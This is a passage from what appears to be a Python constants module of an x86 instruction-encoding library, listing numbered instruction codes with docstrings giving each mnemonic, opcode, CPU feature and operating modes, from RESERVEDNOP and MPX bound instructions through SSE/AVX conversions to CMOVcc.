``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1E: int = 1029
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1E /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1F: int = 1030
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1F /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1F: int = 1031
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1F /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1F: int = 1032
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1F /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
PREFETCHNTA_M8: int = 1033
"""
``PREFETCHNTA m8``
``0F 18 /0``
``SSE``
``16/32/64-bit``
"""
PREFETCHT0_M8: int = 1034
"""
``PREFETCHT0 m8``
``0F 18 /1``
``SSE``
``16/32/64-bit``
"""
PREFETCHT1_M8: int = 1035
"""
``PREFETCHT1 m8``
``0F 18 /2``
``SSE``
``16/32/64-bit``
"""
PREFETCHT2_M8: int = 1036
"""
``PREFETCHT2 m8``
``0F 18 /3``
``SSE``
``16/32/64-bit``
"""
BNDLDX_BND_MIB: int = 1037
"""
``BNDLDX bnd, mib``
``NP 0F 1A /r``
``MPX``
``16/32/64-bit``
"""
BNDMOV_BND_BNDM64: int = 1038
"""
``BNDMOV bnd1, bnd2/m64``
``66 0F 1A /r``
``MPX``
``16/32-bit``
"""
BNDMOV_BND_BNDM128: int = 1039
"""
``BNDMOV bnd1, bnd2/m128``
``66 0F 1A /r``
``MPX``
``64-bit``
"""
BNDCL_BND_RM32: int = 1040
"""
``BNDCL bnd, r/m32``
``F3 0F 1A /r``
``MPX``
``16/32-bit``
"""
BNDCL_BND_RM64: int = 1041
"""
``BNDCL bnd, r/m64``
``F3 0F 1A /r``
``MPX``
``64-bit``
"""
BNDCU_BND_RM32: int = 1042
"""
``BNDCU bnd, r/m32``
``F2 0F 1A /r``
``MPX``
``16/32-bit``
"""
BNDCU_BND_RM64: int = 1043
"""
``BNDCU bnd, r/m64``
``F2 0F 1A /r``
``MPX``
``64-bit``
"""
BNDSTX_MIB_BND: int = 1044
"""
``BNDSTX mib, bnd``
``NP 0F 1B /r``
``MPX``
``16/32/64-bit``
"""
BNDMOV_BNDM64_BND: int = 1045
"""
``BNDMOV bnd1/m64, bnd2``
``66 0F 1B /r``
``MPX``
``16/32-bit``
"""
BNDMOV_BNDM128_BND: int = 1046
"""
``BNDMOV bnd1/m128, bnd2``
``66 0F 1B /r``
``MPX``
``64-bit``
"""
BNDMK_BND_M32: int = 1047
"""
``BNDMK bnd, m32``
``F3 0F 1B /r``
``MPX``
``16/32-bit``
"""
BNDMK_BND_M64: int = 1048
"""
``BNDMK bnd, m64``
``F3 0F 1B /r``
``MPX``
``64-bit``
"""
BNDCN_BND_RM32: int = 1049
"""
``BNDCN bnd, r/m32``
``F2 0F 1B /r``
``MPX``
``16/32-bit``
"""
BNDCN_BND_RM64: int = 1050
"""
``BNDCN bnd, r/m64``
``F2 0F 1B /r``
``MPX``
``64-bit``
"""
CLDEMOTE_M8: int = 1051
"""
``CLDEMOTE m8``
``NP 0F 1C /0``
``CLDEMOTE``
``16/32/64-bit``
"""
RDSSPD_R32: int = 1052
"""
``RDSSPD r32``
``F3 0F 1E /1``
``CET_SS``
``16/32/64-bit``
"""
RDSSPQ_R64: int = 1053
"""
``RDSSPQ r64``
``F3 o64 0F 1E /1``
``CET_SS``
``64-bit``
"""
ENDBR64: int = 1054
"""
``ENDBR64``
``F3 0F 1E FA``
``CET_IBT``
``16/32/64-bit``
"""
ENDBR32: int = 1055
"""
``ENDBR32``
``F3 0F 1E FB``
``CET_IBT``
``16/32/64-bit``
"""
NOP_RM16: int = 1056
"""
``NOP r/m16``
``o16 0F 1F /0``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
NOP_RM32: int = 1057
"""
``NOP r/m32``
``o32 0F 1F /0``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
NOP_RM64: int = 1058
"""
``NOP r/m64``
``o64 0F 1F /0``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
MOV_R32_CR: int = 1059
"""
``MOV r32, cr``
``0F 20 /r``
``386+``
``16/32-bit``
"""
MOV_R64_CR: int = 1060
"""
``MOV r64, cr``
``0F 20 /r``
``X64``
``64-bit``
"""
MOV_R32_DR: int = 1061
"""
``MOV r32, dr``
``0F 21 /r``
``386+``
``16/32-bit``
"""
MOV_R64_DR: int = 1062
"""
``MOV r64, dr``
``0F 21 /r``
``X64``
``64-bit``
"""
MOV_CR_R32: int = 1063
"""
``MOV cr, r32``
``0F 22 /r``
``386+``
``16/32-bit``
"""
MOV_CR_R64: int = 1064
"""
``MOV cr, r64``
``0F 22 /r``
``X64``
``64-bit``
"""
MOV_DR_R32: int = 1065
"""
``MOV dr, r32``
``0F 23 /r``
``386+``
``16/32-bit``
"""
MOV_DR_R64: int = 1066
"""
``MOV dr, r64``
``0F 23 /r``
``X64``
``64-bit``
"""
MOV_R32_TR: int = 1067
"""
``MOV r32, tr``
``0F 24 /r``
``386/486/Cyrix/Geode``
``16/32-bit``
"""
MOV_TR_R32: int = 1068
"""
``MOV tr, r32``
``0F 26 /r``
``386/486/Cyrix/Geode``
``16/32-bit``
"""
MOVAPS_XMM_XMMM128: int = 1069
"""
``MOVAPS xmm1, xmm2/m128``
``NP 0F 28 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVAPS_XMM_XMMM128: int = 1070
"""
``VMOVAPS xmm1, xmm2/m128``
``VEX.128.0F.WIG 28 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVAPS_YMM_YMMM256: int = 1071
"""
``VMOVAPS ymm1, ymm2/m256``
``VEX.256.0F.WIG 28 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVAPS_XMM_K1Z_XMMM128: int = 1072
"""
``VMOVAPS xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.0F.W0 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPS_YMM_K1Z_YMMM256: int = 1073
"""
``VMOVAPS ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.0F.W0 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPS_ZMM_K1Z_ZMMM512: int = 1074
"""
``VMOVAPS zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.0F.W0 28 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVAPD_XMM_XMMM128: int = 1075
"""
``MOVAPD xmm1, xmm2/m128``
``66 0F 28 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVAPD_XMM_XMMM128: int = 1076
"""
``VMOVAPD xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 28 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVAPD_YMM_YMMM256: int = 1077
"""
``VMOVAPD ymm1, ymm2/m256``
``VEX.256.66.0F.WIG 28 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVAPD_XMM_K1Z_XMMM128: int = 1078
"""
``VMOVAPD xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F.W1 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPD_YMM_K1Z_YMMM256: int = 1079
"""
``VMOVAPD ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F.W1 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPD_ZMM_K1Z_ZMMM512: int = 1080
"""
``VMOVAPD zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F.W1 28 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVAPS_XMMM128_XMM: int = 1081
"""
``MOVAPS xmm2/m128, xmm1``
``NP 0F 29 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVAPS_XMMM128_XMM: int = 1082
"""
``VMOVAPS xmm2/m128, xmm1``
``VEX.128.0F.WIG 29 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVAPS_YMMM256_YMM: int = 1083
"""
``VMOVAPS ymm2/m256, ymm1``
``VEX.256.0F.WIG 29 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVAPS_XMMM128_K1Z_XMM: int = 1084
"""
``VMOVAPS xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.0F.W0 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPS_YMMM256_K1Z_YMM: int = 1085
"""
``VMOVAPS ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.0F.W0 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPS_ZMMM512_K1Z_ZMM: int = 1086
"""
``VMOVAPS zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.0F.W0 29 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVAPD_XMMM128_XMM: int = 1087
"""
``MOVAPD xmm2/m128, xmm1``
``66 0F 29 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVAPD_XMMM128_XMM: int = 1088
"""
``VMOVAPD xmm2/m128, xmm1``
``VEX.128.66.0F.WIG 29 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVAPD_YMMM256_YMM: int = 1089
"""
``VMOVAPD ymm2/m256, ymm1``
``VEX.256.66.0F.WIG 29 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVAPD_XMMM128_K1Z_XMM: int = 1090
"""
``VMOVAPD xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.66.0F.W1 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPD_YMMM256_K1Z_YMM: int = 1091
"""
``VMOVAPD ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.66.0F.W1 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPD_ZMMM512_K1Z_ZMM: int = 1092
"""
``VMOVAPD zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.66.0F.W1 29 /r``
``AVX512F``
``16/32/64-bit``
"""
CVTPI2PS_XMM_MMM64: int = 1093
"""
``CVTPI2PS xmm, mm/m64``
``NP 0F 2A /r``
``SSE``
``16/32/64-bit``
"""
CVTPI2PD_XMM_MMM64: int = 1094
"""
``CVTPI2PD xmm, mm/m64``
``66 0F 2A /r``
``SSE2``
``16/32/64-bit``
"""
CVTSI2SS_XMM_RM32: int = 1095
"""
``CVTSI2SS xmm1, r/m32``
``F3 0F 2A /r``
``SSE``
``16/32/64-bit``
"""
CVTSI2SS_XMM_RM64: int = 1096
"""
``CVTSI2SS xmm1, r/m64``
``F3 o64 0F 2A /r``
``SSE``
``64-bit``
"""
VEX_VCVTSI2SS_XMM_XMM_RM32: int = 1097
"""
``VCVTSI2SS xmm1, xmm2, r/m32``
``VEX.LIG.F3.0F.W0 2A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTSI2SS_XMM_XMM_RM64: int = 1098
"""
``VCVTSI2SS xmm1, xmm2, r/m64``
``VEX.LIG.F3.0F.W1 2A /r``
``AVX``
``64-bit``
"""
EVEX_VCVTSI2SS_XMM_XMM_RM32_ER: int = 1099
"""
``VCVTSI2SS xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F3.0F.W0 2A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSI2SS_XMM_XMM_RM64_ER: int = 1100
"""
``VCVTSI2SS xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F3.0F.W1 2A /r``
``AVX512F``
``64-bit``
"""
CVTSI2SD_XMM_RM32: int = 1101
"""
``CVTSI2SD xmm1, r/m32``
``F2 0F 2A /r``
``SSE2``
``16/32/64-bit``
"""
CVTSI2SD_XMM_RM64: int = 1102
"""
``CVTSI2SD xmm1, r/m64``
``F2 o64 0F 2A /r``
``SSE2``
``64-bit``
"""
VEX_VCVTSI2SD_XMM_XMM_RM32: int = 1103
"""
``VCVTSI2SD xmm1, xmm2, r/m32``
``VEX.LIG.F2.0F.W0 2A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTSI2SD_XMM_XMM_RM64: int = 1104
"""
``VCVTSI2SD xmm1, xmm2, r/m64``
``VEX.LIG.F2.0F.W1 2A /r``
``AVX``
``64-bit``
"""
EVEX_VCVTSI2SD_XMM_XMM_RM32_ER: int = 1105
"""
``VCVTSI2SD xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F2.0F.W0 2A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSI2SD_XMM_XMM_RM64_ER: int = 1106
"""
``VCVTSI2SD xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F2.0F.W1 2A /r``
``AVX512F``
``64-bit``
"""
MOVNTPS_M128_XMM: int = 1107
"""
``MOVNTPS m128, xmm1``
``NP 0F 2B /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVNTPS_M128_XMM: int = 1108
"""
``VMOVNTPS m128, xmm1``
``VEX.128.0F.WIG 2B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVNTPS_M256_YMM: int = 1109
"""
``VMOVNTPS m256, ymm1``
``VEX.256.0F.WIG 2B /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVNTPS_M128_XMM: int = 1110
"""
``VMOVNTPS m128, xmm1``
``EVEX.128.0F.W0 2B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTPS_M256_YMM: int = 1111
"""
``VMOVNTPS m256, ymm1``
``EVEX.256.0F.W0 2B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTPS_M512_ZMM: int = 1112
"""
``VMOVNTPS m512, zmm1``
``EVEX.512.0F.W0 2B /r``
``AVX512F``
``16/32/64-bit``
"""
MOVNTPD_M128_XMM: int = 1113
"""
``MOVNTPD m128, xmm1``
``66 0F 2B /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVNTPD_M128_XMM: int = 1114
"""
``VMOVNTPD m128, xmm1``
``VEX.128.66.0F.WIG 2B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVNTPD_M256_YMM: int = 1115
"""
``VMOVNTPD m256, ymm1``
``VEX.256.66.0F.WIG 2B /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVNTPD_M128_XMM: int = 1116
"""
``VMOVNTPD m128, xmm1``
``EVEX.128.66.0F.W1 2B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTPD_M256_YMM: int = 1117
"""
``VMOVNTPD m256, ymm1``
``EVEX.256.66.0F.W1 2B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTPD_M512_ZMM: int = 1118
"""
``VMOVNTPD m512, zmm1``
``EVEX.512.66.0F.W1 2B /r``
``AVX512F``
``16/32/64-bit``
"""
MOVNTSS_M32_XMM: int = 1119
"""
``MOVNTSS m32, xmm1``
``F3 0F 2B /r``
``SSE4A``
``16/32/64-bit``
"""
MOVNTSD_M64_XMM: int = 1120
"""
``MOVNTSD m64, xmm1``
``F2 0F 2B /r``
``SSE4A``
``16/32/64-bit``
"""
CVTTPS2PI_MM_XMMM64: int = 1121
"""
``CVTTPS2PI mm, xmm/m64``
``NP 0F 2C /r``
``SSE``
``16/32/64-bit``
"""
CVTTPD2PI_MM_XMMM128: int = 1122
"""
``CVTTPD2PI mm, xmm/m128``
``66 0F 2C /r``
``SSE2``
``16/32/64-bit``
"""
CVTTSS2SI_R32_XMMM32: int = 1123
"""
``CVTTSS2SI r32, xmm1/m32``
``F3 0F 2C /r``
``SSE``
``16/32/64-bit``
"""
CVTTSS2SI_R64_XMMM32: int = 1124
"""
``CVTTSS2SI r64, xmm1/m32``
``F3 o64 0F 2C /r``
``SSE``
``64-bit``
"""
VEX_VCVTTSS2SI_R32_XMMM32: int = 1125
"""
``VCVTTSS2SI r32, xmm1/m32``
``VEX.LIG.F3.0F.W0 2C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTTSS2SI_R64_XMMM32: int = 1126
"""
``VCVTTSS2SI r64, xmm1/m32``
``VEX.LIG.F3.0F.W1 2C /r``
``AVX``
``64-bit``
"""
EVEX_VCVTTSS2SI_R32_XMMM32_SAE: int = 1127
"""
``VCVTTSS2SI r32, xmm1/m32{sae}``
``EVEX.LIG.F3.0F.W0 2C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTSS2SI_R64_XMMM32_SAE: int = 1128
"""
``VCVTTSS2SI r64, xmm1/m32{sae}``
``EVEX.LIG.F3.0F.W1 2C /r``
``AVX512F``
``64-bit``
"""
CVTTSD2SI_R32_XMMM64: int = 1129
"""
``CVTTSD2SI r32, xmm1/m64``
``F2 0F 2C /r``
``SSE2``
``16/32/64-bit``
"""
CVTTSD2SI_R64_XMMM64: int = 1130
"""
``CVTTSD2SI r64, xmm1/m64``
``F2 o64 0F 2C /r``
``SSE2``
``64-bit``
"""
VEX_VCVTTSD2SI_R32_XMMM64: int = 1131
"""
``VCVTTSD2SI r32, xmm1/m64``
``VEX.LIG.F2.0F.W0 2C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTTSD2SI_R64_XMMM64: int = 1132
"""
``VCVTTSD2SI r64, xmm1/m64``
``VEX.LIG.F2.0F.W1 2C /r``
``AVX``
``64-bit``
"""
EVEX_VCVTTSD2SI_R32_XMMM64_SAE: int = 1133
"""
``VCVTTSD2SI r32, xmm1/m64{sae}``
``EVEX.LIG.F2.0F.W0 2C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTSD2SI_R64_XMMM64_SAE: int = 1134
"""
``VCVTTSD2SI r64, xmm1/m64{sae}``
``EVEX.LIG.F2.0F.W1 2C /r``
``AVX512F``
``64-bit``
"""
CVTPS2PI_MM_XMMM64: int = 1135
"""
``CVTPS2PI mm, xmm/m64``
``NP 0F 2D /r``
``SSE``
``16/32/64-bit``
"""
CVTPD2PI_MM_XMMM128: int = 1136
"""
``CVTPD2PI mm, xmm/m128``
``66 0F 2D /r``
``SSE2``
``16/32/64-bit``
"""
CVTSS2SI_R32_XMMM32: int = 1137
"""
``CVTSS2SI r32, xmm1/m32``
``F3 0F 2D /r``
``SSE``
``16/32/64-bit``
"""
CVTSS2SI_R64_XMMM32: int = 1138
"""
``CVTSS2SI r64, xmm1/m32``
``F3 o64 0F 2D /r``
``SSE``
``64-bit``
"""
VEX_VCVTSS2SI_R32_XMMM32: int = 1139
"""
``VCVTSS2SI r32, xmm1/m32``
``VEX.LIG.F3.0F.W0 2D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTSS2SI_R64_XMMM32: int = 1140
"""
``VCVTSS2SI r64, xmm1/m32``
``VEX.LIG.F3.0F.W1 2D /r``
``AVX``
``64-bit``
"""
EVEX_VCVTSS2SI_R32_XMMM32_ER: int = 1141
"""
``VCVTSS2SI r32, xmm1/m32{er}``
``EVEX.LIG.F3.0F.W0 2D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSS2SI_R64_XMMM32_ER: int = 1142
"""
``VCVTSS2SI r64, xmm1/m32{er}``
``EVEX.LIG.F3.0F.W1 2D /r``
``AVX512F``
``64-bit``
"""
CVTSD2SI_R32_XMMM64: int = 1143
"""
``CVTSD2SI r32, xmm1/m64``
``F2 0F 2D /r``
``SSE2``
``16/32/64-bit``
"""
CVTSD2SI_R64_XMMM64: int = 1144
"""
``CVTSD2SI r64, xmm1/m64``
``F2 o64 0F 2D /r``
``SSE2``
``64-bit``
"""
VEX_VCVTSD2SI_R32_XMMM64: int = 1145
"""
``VCVTSD2SI r32, xmm1/m64``
``VEX.LIG.F2.0F.W0 2D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTSD2SI_R64_XMMM64: int = 1146
"""
``VCVTSD2SI r64, xmm1/m64``
``VEX.LIG.F2.0F.W1 2D /r``
``AVX``
``64-bit``
"""
EVEX_VCVTSD2SI_R32_XMMM64_ER: int = 1147
"""
``VCVTSD2SI r32, xmm1/m64{er}``
``EVEX.LIG.F2.0F.W0 2D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSD2SI_R64_XMMM64_ER: int = 1148
"""
``VCVTSD2SI r64, xmm1/m64{er}``
``EVEX.LIG.F2.0F.W1 2D /r``
``AVX512F``
``64-bit``
"""
UCOMISS_XMM_XMMM32: int = 1149
"""
``UCOMISS xmm1, xmm2/m32``
``NP 0F 2E /r``
``SSE``
``16/32/64-bit``
"""
VEX_VUCOMISS_XMM_XMMM32: int = 1150
"""
``VUCOMISS xmm1, xmm2/m32``
``VEX.LIG.0F.WIG 2E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUCOMISS_XMM_XMMM32_SAE: int = 1151
"""
``VUCOMISS xmm1, xmm2/m32{sae}``
``EVEX.LIG.0F.W0 2E /r``
``AVX512F``
``16/32/64-bit``
"""
UCOMISD_XMM_XMMM64: int = 1152
"""
``UCOMISD xmm1, xmm2/m64``
``66 0F 2E /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VUCOMISD_XMM_XMMM64: int = 1153
"""
``VUCOMISD xmm1, xmm2/m64``
``VEX.LIG.66.0F.WIG 2E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUCOMISD_XMM_XMMM64_SAE: int = 1154
"""
``VUCOMISD xmm1, xmm2/m64{sae}``
``EVEX.LIG.66.0F.W1 2E /r``
``AVX512F``
``16/32/64-bit``
"""
COMISS_XMM_XMMM32: int = 1155
"""
``COMISS xmm1, xmm2/m32``
``NP 0F 2F /r``
``SSE``
``16/32/64-bit``
"""
COMISD_XMM_XMMM64: int = 1156
"""
``COMISD xmm1, xmm2/m64``
``66 0F 2F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCOMISS_XMM_XMMM32: int = 1157
"""
``VCOMISS xmm1, xmm2/m32``
``VEX.LIG.0F.WIG 2F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCOMISD_XMM_XMMM64: int = 1158
"""
``VCOMISD xmm1, xmm2/m64``
``VEX.LIG.66.0F.WIG 2F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCOMISS_XMM_XMMM32_SAE: int = 1159
"""
``VCOMISS xmm1, xmm2/m32{sae}``
``EVEX.LIG.0F.W0 2F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMISD_XMM_XMMM64_SAE: int = 1160
"""
``VCOMISD xmm1, xmm2/m64{sae}``
``EVEX.LIG.66.0F.W1 2F /r``
``AVX512F``
``16/32/64-bit``
"""
WRMSR: int = 1161
"""
``WRMSR``
``0F 30``
``MSR``
``16/32/64-bit``
"""
RDTSC: int = 1162
"""
``RDTSC``
``0F 31``
``TSC``
``16/32/64-bit``
"""
RDMSR: int = 1163
"""
``RDMSR``
``0F 32``
``MSR``
``16/32/64-bit``
"""
RDPMC: int = 1164
"""
``RDPMC``
``0F 33``
``Pentium MMX or later, or Pentium Pro or later``
``16/32/64-bit``
"""
SYSENTER: int = 1165
"""
``SYSENTER``
``0F 34``
``SEP``
``16/32/64-bit``
"""
SYSEXITD: int = 1166
"""
``SYSEXIT``
``0F 35``
``SEP``
``16/32/64-bit``
"""
SYSEXITQ: int = 1167
"""
``SYSEXITQ``
``o64 0F 35``
``SEP``
``64-bit``
"""
GETSECD: int = 1168
"""
``GETSEC``
``NP 0F 37``
``SMX``
``16/32/64-bit``
"""
CMOVO_R16_RM16: int = 1169
"""
``CMOVO r16, r/m16``
``o16 0F 40 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVO_R32_RM32: int = 1170
"""
``CMOVO r32, r/m32``
``o32 0F 40 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVO_R64_RM64: int = 1171
"""
``CMOVO r64, r/m64``
``o64 0F 40 /r``
``CMOV``
``64-bit``
"""
CMOVNO_R16_RM16: int = 1172
"""
``CMOVNO r16, r/m16``
``o16 0F 41 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNO_R32_RM32: int = 1173
"""
``CMOVNO r32, r/m32``
``o32 0F 41 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNO_R64_RM64: int = 1174
"""
``CMOVNO r64, r/m64``
``o64 0F 41 /r``
``CMOV``
``64-bit``
"""
CMOVB_R16_RM16: int = 1175
"""
``CMOVB r16, r/m16``
``o16 0F 42 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVB_R32_RM32: int = 1176
"""
``CMOVB r32, r/m32``
``o32 0F 42 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVB_R64_RM64: int = 1177
"""
``CMOVB r64, r/m64``
``o64 0F 42 /r``
``CMOV``
``64-bit``
"""
CMOVAE_R16_RM16: int = 1178
"""
``CMOVAE r16, r/m16``
``o16 0F 43 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVAE_R32_RM32: int = 1179
"""
``CMOVAE r32, r/m32``
``o32 0F 43 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVAE_R64_RM64: int = 1180
"""
``CMOVAE r64, r/m64``
``o64 0F 43 /r``
``CMOV``
``64-bit``
"""
CMOVE_R16_RM16: int = 1181
"""
``CMOVE r16, r/m16``
``o16 0F 44 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVE_R32_RM32: int = 1182
"""
``CMOVE r32, r/m32``
``o32 0F 44 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVE_R64_RM64: int = 1183
"""
``CMOVE r64, r/m64``
``o64 0F 44 /r``
``CMOV``
``64-bit``
"""
CMOVNE_R16_RM16: int = 1184
"""
``CMOVNE r16, r/m16``
``o16 0F 45 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNE_R32_RM32: int = 1185
"""
``CMOVNE r32, r/m32``
``o32 0F 45 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNE_R64_RM64: int = 1186
"""
``CMOVNE r64, r/m64``
``o64 0F 45 /r``
``CMOV``
``64-bit``
"""
CMOVBE_R16_RM16: int = 1187
"""
``CMOVBE r16, r/m16``
``o16 0F 46 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVBE_R32_RM32: int = 1188
"""
``CMOVBE r32, r/m32``
``o32 0F 46 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVBE_R64_RM64: int = 1189
"""
``CMOVBE r64, r/m64``
``o64 0F 46 /r``
``CMOV``
``64-bit``
"""
CMOVA_R16_RM16: int = 1190
"""
``CMOVA r16, r/m16``
``o16 0F 47 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVA_R32_RM32: int = 1191
"""
``CMOVA r32, r/m32``
``o32 0F 47 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVA_R64_RM64: int = 1192
"""
``CMOVA r64, r/m64``
``o64 0F 47 /r``
``CMOV``
``64-bit``
"""
CMOVS_R16_RM16: int = 1193
"""
``CMOVS r16, r/m16``
``o16 0F 48 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVS_R32_RM32: int = 1194
"""
``CMOVS r32, r/m32``
``o32 0F 48 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVS_R64_RM64: int = 1195
"""
``CMOVS r64, r/m64``
``o64 0F 48 /r``
``CMOV``
``64-bit``
"""
CMOVNS_R16_RM16: int = 1196
"""
``CMOVNS r16, r/m16``
``o16 0F 49 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNS_R32_RM32: int = 1197
"""
``CMOVNS r32, r/m32``
``o32 0F 49 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNS_R64_RM64: int = 1198
"""
``CMOVNS r64, r/m64``
``o64 0F 49 /r``
``CMOV``
``64-bit``
"""
CMOVP_R16_RM16: int = 1199
"""
``CMOVP r16, r/m16``
``o16 0F 4A /r``
``CMOV``
``16/32/64-bit``
"""
CMOVP_R32_RM32: int = 1200
"""
``CMOVP r32, r/m32``
``o32 0F 4A /r``
``CMOV``
``16/32/64-bit``
"""
CMOVP_R64_RM64: int = 1201
"""
``CMOVP r64, r/m64``
``o64 0F 4A /r``
``CMOV``
``64-bit``
"""
CMOVNP_R16_RM16: int = 1202
"""
``CMOVNP r16, r/m16``
``o16 0F 4B /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNP_R32_RM32: int = 1203
"""
``CMOVNP r32, r/m32``
``o32 0F 4B /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNP_R64_RM64: int = 1204
"""
``CMOVNP r64, r/m64``
``o64 0F 4B /r``
``CMOV``
``64-bit``
"""
CMOVL_R16_RM16: int = 1205
"""
``CMOVL r16, r/m16``
``o16 0F 4C /r``
``CMOV``
``16/32/64-bit``
"""
CMOVL_R32_RM32: int = 1206
"""
``CMOVL r32, r/m32``
``o32 0F 4C /r``
``CMOV``
``16/32/64-bit``
"""
CMOVL_R64_RM64: int = 1207
"""
``CMOVL r64, r/m64``
``o64 0F 4C /r``
``CMOV``
``64-bit``
"""
CMOVGE_R16_RM16: int = 1208
"""
``CMOVGE r16, r/m16``
``o16 0F 4D /r``
``CMOV``
``16/32/64-bit``
"""
CMOVGE_R32_RM32: int = 1209
"""
``CMOVGE r32, r/m32``
``o32 0F 4D /r``
``CMOV``
``16/32/64-bit``
"""
CMOVGE_R64_RM64: int = 1210
"""
